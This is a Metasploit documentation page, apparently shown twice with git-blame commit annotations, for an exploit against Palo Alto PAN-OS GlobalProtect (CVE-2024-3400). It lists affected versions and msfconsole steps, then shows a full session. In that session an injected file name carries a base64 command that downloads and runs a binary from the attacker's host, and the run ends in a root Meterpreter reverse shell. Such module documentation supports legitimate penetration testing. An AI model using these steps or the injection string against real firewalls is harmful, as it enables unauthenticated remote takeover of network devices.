documentation/modules/exploit/linux/http/panos_telemetry_cmd_exec.md

## Vulnerable Application
This module exploits two vulnerabilities in Palo Alto Networks PAN-OS that
allow an unauthenticated attacker to create arbitrarily named files and execute
shell commands. Configuration requirements are PAN-OS with GlobalProtect Gateway or
GlobalProtect Portal enabled and telemetry collection on (default). Affected versions
include < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1,
< 10.2.5-h6, < 10.2.6-h3, < 10.2.8-h3, and < 10.2.9-h1. Payloads may take up to
one hour to execute, depending on how often the telemetry service is set to run.

For a technical analysis of the vulnerability, read our [Rapid7 Analysis](https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis).

## Testing
Boot a vulnerable PAN-OS VM or device, then authenticate to the management web service with default credentials. From the
web dashboard, configure a GlobalProtect [Portal](https://docs.paloaltonetworks.com/globalprotect/10-1/globalprotect-admin/globalprotect-portals/set-up-access-to-the-globalprotect-portal)
and/or [Gateway](https://docs.paloaltonetworks.com/globalprotect/10-1/globalprotect-admin/globalprotect-gateways/configure-a-globalprotect-gateway).
With either or both started, the `gpsvc` service will begin serving an HTTPS service on port 443 for the second
network interface. Confirm that the web service presents a Palo Alto Networks login page when viewed. This web application
is the target of the exploit, and the '/global-protect/login.esp' page should be accessible.

The exploit has been tested against PAN-OS 10.2.9, and it should also be effective against other similarly-configured 10.2, 11.0,
and 11.1 versions.

## Verification Steps

1. Start msfconsole
2. `use exploit/linux/http/panos_telemetry_cmd_exec`
3. `set RHOST <TARGET_IP_ADDRESS>`
4. `set payload cmd/linux/http/x64/meterpreter_reverse_tcp`
5. `set LHOST eth0`
6. `check`
7. `exploit`

## Scenarios

### Linux Command

Note: Ensure the target is vulnerable to unauthenticated file creation with the `check` command.

Note: Since it can take up to one hour to establish code execution, the listener should be left running for that period.

Note: In the standard PAN-OS configuration, the payload is delivered to the GlobalProtect interface IP, but the shell will return via a different PAN-OS management interface IP. 

```
msf > use exploit/linux/http/panos_telemetry_cmd_exec
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf exploit(linux/http/panos_telemetry_cmd_exec) > show options

Module options (exploit/linux/http/panos_telemetry_cmd_exec):

   Name       Current Setting            Required  Description
   ----       ---------------            --------  -----------
   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      443                        yes       The target port (TCP)
   SSL        true                       no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /global-protect/login.esp  yes       An existing web application endpoint
   VHOST                                 no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      EkcxbboZMyD      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /var/tmp         yes       Remote writable dir to store payload; cannot contain spaces
   LHOST                                yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Default


View the full module info with the info, or info -d command.

msf exploit(linux/http/panos_telemetry_cmd_exec) > set RHOSTS 192.168.50.226
RHOSTS => 192.168.50.226
msf exploit(linux/http/panos_telemetry_cmd_exec) > set LHOST 192.168.50.25
LHOST => 192.168.50.25
msf exploit(linux/http/panos_telemetry_cmd_exec) > set LPORT 8585
LPORT => 8585
msf exploit(linux/http/panos_telemetry_cmd_exec) > check
[+] 192.168.50.226:443 - The target is vulnerable. Arbitrary file write succeeded: /var/appweb/sslvpndocs/global-protect/portal/fonts/glyphicons-ipteqmbl-regular.woff2 NOTE: This file will not be deleted
msf exploit(linux/http/panos_telemetry_cmd_exec) > exploit

[*] Started reverse TCP handler on 192.168.50.25:8585 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Arbitrary file write succeeded: /var/appweb/sslvpndocs/global-protect/portal/fonts/glyphicons-ikxrpbmq-regular.woff2 NOTE: This file will not be deleted
[*] Depending on the PAN-OS version, it may take the telemetry service up to one hour to execute the payload
[*] Though exploitation of the arbitrary file creation vulnerability succeeded, command injection will fail if the default telemetry service has been disabled
[*] Meterpreter session 1 opened (192.168.50.25:8585 -> 192.168.50.216:48310) at 2024-04-18 14:53:09 -0500
[!] This exploit may require manual cleanup of '/opt/panlogs/tmp/device_telemetry/minute/lyne`echo${IFS}-n${IFS}d2dldCAtcU8gL3Zhci90bXAvdWdWZlhXUnhWIGh0dHA6Ly8xOTIuMTY4LjUwLjI1OjgwODAvcUpPXzJ2MUFPVkRIc2hsVVIyRHVzQTsgY2htb2QgK3ggL3Zhci90bXAvdWdWZlhXUnhWOyAvdmFyL3RtcC91Z1ZmWFdSeFYgJg==|base64${IFS}-d|bash${IFS}-`' on the target

meterpreter > getuid 
Server username: root
meterpreter > sysinfo 
Computer     : 192.168.50.216
OS           : CentOS 8.3.2011 (Linux 4.18.0-240.1.1.20.pan.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```
Incorporating PAN-OS module peer review suggestions, adding documentation for the module 2024-04-18 18:21:12 -05:00			`## Vulnerable Application`
			`This module exploits two vulnerabilities in Palo Alto Networks PAN-OS that`
			`allow an unauthenticated attacker to create arbitrarily named files and execute`
			`shell commands. Configuration requirements are PAN-OS with GlobalProtect Gateway or`
			`GlobalProtect Portal enabled and telemetry collection on (default). Affected versions`
			`include < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1,`
			`< 10.2.5-h6, < 10.2.6-h3, < 10.2.8-h3, and < 10.2.9-h1. Payloads may take up to`
			`one hour to execute, depending on how often the telemetry service is set to run.`

			`For a technical analysis of the vulnerability, read our [Rapid7 Analysis](https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis).`

			`## Testing`
			`Boot a vulnerable PAN-OS VM or device, then authenticate to the management web service with default credentials. From the`
			`web dashboard, configure a GlobalProtect [Portal](https://docs.paloaltonetworks.com/globalprotect/10-1/globalprotect-admin/globalprotect-portals/set-up-access-to-the-globalprotect-portal)`
			`and/or [Gateway](https://docs.paloaltonetworks.com/globalprotect/10-1/globalprotect-admin/globalprotect-gateways/configure-a-globalprotect-gateway).`
			With either or both started, the `gpsvc` service will begin serving an HTTPS service on port 443 for the second
			`network interface. Confirm that the web service presents a Palo Alto Networks login page when viewed. This web application`
			`is the target of the exploit, and the '/global-protect/login.esp' page should be accessible.`

Incorporate documentation wording change from suggestion 2024-04-19 08:50:20 -05:00			`The exploit has been tested against PAN-OS 10.2.9, and it should also be effective against other similarly-configured 10.2, 11.0,`
Incorporating PAN-OS module peer review suggestions, adding documentation for the module 2024-04-18 18:21:12 -05:00			`and 11.1 versions.`

			`## Verification Steps`

			`1. Start msfconsole`
			2. `use exploit/linux/http/panos_telemetry_cmd_exec`
			3. `set RHOST <TARGET_IP_ADDRESS>`
			4. `set payload cmd/linux/http/x64/meterpreter_reverse_tcp`
			5. `set LHOST eth0`
			6. `check`
			7. `exploit`

			`## Scenarios`

			`### Linux Command`

			Note: Ensure the target is vulnerable to unauthenticated file creation with the `check` command.

			`Note: Since it can take up to one hour to establish code execution, the listener should be left running for that period.`

Added note about shell from a different IP than RHOST IP 2024-04-19 11:45:56 -05:00			`Note: In the standard PAN-OS configuration, the payload is delivered to the GlobalProtect interface IP, but the shell will return via a different PAN-OS management interface IP.`

Incorporating PAN-OS module peer review suggestions, adding documentation for the module 2024-04-18 18:21:12 -05:00			```
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf > use exploit/linux/http/panos_telemetry_cmd_exec`
Incorporating PAN-OS module peer review suggestions, adding documentation for the module 2024-04-18 18:21:12 -05:00			`[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/panos_telemetry_cmd_exec) > show options`
Incorporating PAN-OS module peer review suggestions, adding documentation for the module 2024-04-18 18:21:12 -05:00
			`Module options (exploit/linux/http/panos_telemetry_cmd_exec):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`Proxies no A proxy chain of format type:host:port[,type:host:port][...]`
			`RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html`
			`RPORT 443 yes The target port (TCP)`
			`SSL true no Negotiate SSL/TLS for outgoing connections`
			`TARGETURI /global-protect/login.esp yes An existing web application endpoint`
			`VHOST no HTTP server virtual host`


			`Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`FETCH_COMMAND WGET yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)`
			`FETCH_DELETE false yes Attempt to delete the binary after execution`
			`FETCH_FILENAME EkcxbboZMyD no Name to use on remote system when storing payload; cannot contain spaces or slashes`
			`FETCH_SRVHOST no Local IP to use for serving payload`
			`FETCH_SRVPORT 8080 yes Local port to use for serving payload`
			`FETCH_URIPATH no Local URI to use for serving payload`
			`FETCH_WRITABLE_DIR /var/tmp yes Remote writable dir to store payload; cannot contain spaces`
			`LHOST yes The listen address (an interface may be specified)`
			`LPORT 4444 yes The listen port`


			`Exploit target:`

			`Id Name`
			`-- ----`
			`0 Default`



			`View the full module info with the info, or info -d command.`

Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/panos_telemetry_cmd_exec) > set RHOSTS 192.168.50.226`
Incorporating PAN-OS module peer review suggestions, adding documentation for the module 2024-04-18 18:21:12 -05:00			`RHOSTS => 192.168.50.226`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/panos_telemetry_cmd_exec) > set LHOST 192.168.50.25`
Incorporating PAN-OS module peer review suggestions, adding documentation for the module 2024-04-18 18:21:12 -05:00			`LHOST => 192.168.50.25`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/panos_telemetry_cmd_exec) > set LPORT 8585`
Incorporating PAN-OS module peer review suggestions, adding documentation for the module 2024-04-18 18:21:12 -05:00			`LPORT => 8585`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/panos_telemetry_cmd_exec) > check`
Incorporating PAN-OS module peer review suggestions, adding documentation for the module 2024-04-18 18:21:12 -05:00			`[+] 192.168.50.226:443 - The target is vulnerable. Arbitrary file write succeeded: /var/appweb/sslvpndocs/global-protect/portal/fonts/glyphicons-ipteqmbl-regular.woff2 NOTE: This file will not be deleted`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/panos_telemetry_cmd_exec) > exploit`
Incorporating PAN-OS module peer review suggestions, adding documentation for the module 2024-04-18 18:21:12 -05:00
			`[*] Started reverse TCP handler on 192.168.50.25:8585`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[+] The target is vulnerable. Arbitrary file write succeeded: /var/appweb/sslvpndocs/global-protect/portal/fonts/glyphicons-ikxrpbmq-regular.woff2 NOTE: This file will not be deleted`
			`[*] Depending on the PAN-OS version, it may take the telemetry service up to one hour to execute the payload`
			`[*] Though exploitation of the arbitrary file creation vulnerability succeeded, command injection will fail if the default telemetry service has been disabled`
			`[*] Meterpreter session 1 opened (192.168.50.25:8585 -> 192.168.50.216:48310) at 2024-04-18 14:53:09 -0500`
			[!] This exploit may require manual cleanup of '/opt/panlogs/tmp/device_telemetry/minute/lyne`echo${IFS}-n${IFS}d2dldCAtcU8gL3Zhci90bXAvdWdWZlhXUnhWIGh0dHA6Ly8xOTIuMTY4LjUwLjI1OjgwODAvcUpPXzJ2MUFPVkRIc2hsVVIyRHVzQTsgY2htb2QgK3ggL3Zhci90bXAvdWdWZlhXUnhWOyAvdmFyL3RtcC91Z1ZmWFdSeFYgJg==\|base64${IFS}-d\|bash${IFS}-`' on the target

			`meterpreter > getuid`
			`Server username: root`
			`meterpreter > sysinfo`
			`Computer : 192.168.50.216`
			`OS : CentOS 8.3.2011 (Linux 4.18.0-240.1.1.20.pan.x86_64)`
			`Architecture : x64`
			`BuildTuple : x86_64-linux-musl`
			`Meterpreter : x64/linux`
			`meterpreter >`
Added note about shell from a different IP than RHOST IP 2024-04-19 11:45:56 -05:00			```